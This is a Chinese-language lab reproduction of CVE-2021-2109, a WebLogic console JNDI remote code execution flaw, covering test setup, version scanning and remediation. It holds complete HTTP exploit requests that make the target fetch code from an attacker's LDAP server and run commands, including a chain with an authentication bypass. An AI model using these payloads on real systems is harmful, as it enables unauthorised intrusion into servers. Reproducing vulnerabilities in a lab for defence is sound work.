0x00 简介

WebLogic是美国甲骨文公司出品的一个application server（应用服务器），确切的说是一个基于JAVAEE架构的中间件，WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

0x01 漏洞概述

CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞，经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码，可以配合CVE-2020-14882未授权漏洞执行任意代码。

0x02 影响版本

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

0x03 环境搭建

Java环境配置：

一定要安装jdk1.7

jdk1.7下载链接：http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-windows-x64.exe

具体安装步骤可以自行上网搜索，这里推荐 https://www.runoob.com/java/java-environment-setup.html ， 里面也有jdk下载的官网地址，安装jdk时安装路径最好全英文无空格，安装完后配置环境变量。

如果不安装jdk1.7，后续配置步骤则会遇到如下错误，

安装完Weblogic后打开WebLogic Scripting Tool时可以看到如下报错!

这是由于我们下载安装的weblogic10.3.6版本最高只支持 jdk1.7，而我们给weblogic配置的是1.8版本，

如果已装有jdk1.7，则直接执行以下步骤，没装jdk1.7但已使用jdk1.8安装了weblogic，则在安装完jdk1.7后执行以下步骤

将weblogic安装目录下C:\Oracle\Middleware\wlserver_10.3\common\bin\commEnv.cmd 文件中的。

@rem Reset JAVA Home
set  JAVA_HOME=C:\Java\jdk1.8.0_212
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi

修改为

@rem Reset JAVA Home
set  JAVA_HOME=C:\Java\jdk1.7.0
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi

保存后双击运行即完成配置修改。

安装配置Weblogic Server（Windows）：

Weblogic Server下载链接：

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

页面最底下点击下载10.3.6版本（997M），下载完成后将安装程序放到靶机并运行

具体安装和配置步骤参考以下链接，

https://wenku.baidu.com/link?url=SXkEsiMcpfqhM3IdT5ZZ97aNTmwfO_74dvJoNSWoCp2FIyudzpd1uBSgh2ccFJS6N5Kbn0KKPT-KVRkMlsmgRch9YSJ7fDjag1GWxE7cEfy

只需要完成WebLogic安装步骤即可，配置步骤在本次复现中无需进行。

启动WebLogic并输入用户名密码

访问 http://127.0.0.1:7001/console/ 登录

0x04 漏洞复现

1.本地漏洞检测

行指令查看版本信息

cd /Oracle/Middleware/wlserver_10.3/server/lib
java -cp weblogic.jar weblogic.version

没有显示打补丁的信息则存在漏洞

2.使用Nmap进行远程漏洞扫描

可以通过访问控制台登录页 (/console/login/LoginForm.jsp) 看底部版本号，但是该页面很可能被删除或无法访问，此时可以通过Nmap自带的针对WebLogic的扫描脚本来进行版本探测，Nmap会发送T3协议的数据包，并从返回包中的HELO信息获取weblogic的版本.

nmap -n -v -Pn -sV 192.168.50.0/24 -p 7001,7002 --script=weblogic-t3-info.nse

扫描结果显示192.168.50.139目标靶机开启了7001端口的T3协议

同时WebLogic Server的版本为10.3.6，在CVE-2021-2109影响范围内

3.feihong-cs 版EXP

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

下载编译好的jar包后执行指令来启动LDAP和HTTP服务（-i 选项后接本机IP）

java -jar JNDIExploit-v1.11.jar -i 192.168.50.139

启动后无内容，此时已经打开HTTP和LDAP服务，如果接收到LDAP的请求就会打印出内容并处理,

打开Burpsuite的Repeater模块，填入并修改payload,

POST /console/consolejndi.portal HTTP/1.1
Host: 192.168.50.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: ADMINCONSOLESESSION=1w6DgCLLkQhPRBqkQthhQvPqpT4SvTl22rSjK3kRHxw0WHLhnzG1!-766673213
Connection: close
Content-Length: 176
cmd:whoami

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)

点击 Send 发送payload

服务端接收到payload，执行并返回结果

4.配合使用未授权漏洞

POST /console/css/%252e%252e/consolejndi.portal  HTTP/1.1
Host: 192.168.50.139:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 177
Connection: close

?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)

0x05 修复建议

1.升级Weblogic Server运行环境的JDK版本;

2.禁用T3协议， 进入Weblogic控制台，在base_domain配置页点击“安全”选项卡 -> “筛选器”，配置筛选器，在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，在连接筛选器规则框中输入：* * 7001 deny t3 t3s;

3.使用Weblogic Server官方提供的安全补丁进行修复，https://www.oracle.com/security-alerts/cpujan2021.html;

4.临时关闭后台/console/console.portal对外访问;

5.禁止启用IIOP，登陆Weblogic控制台，找到启用IIOP选项，取消勾选并重启.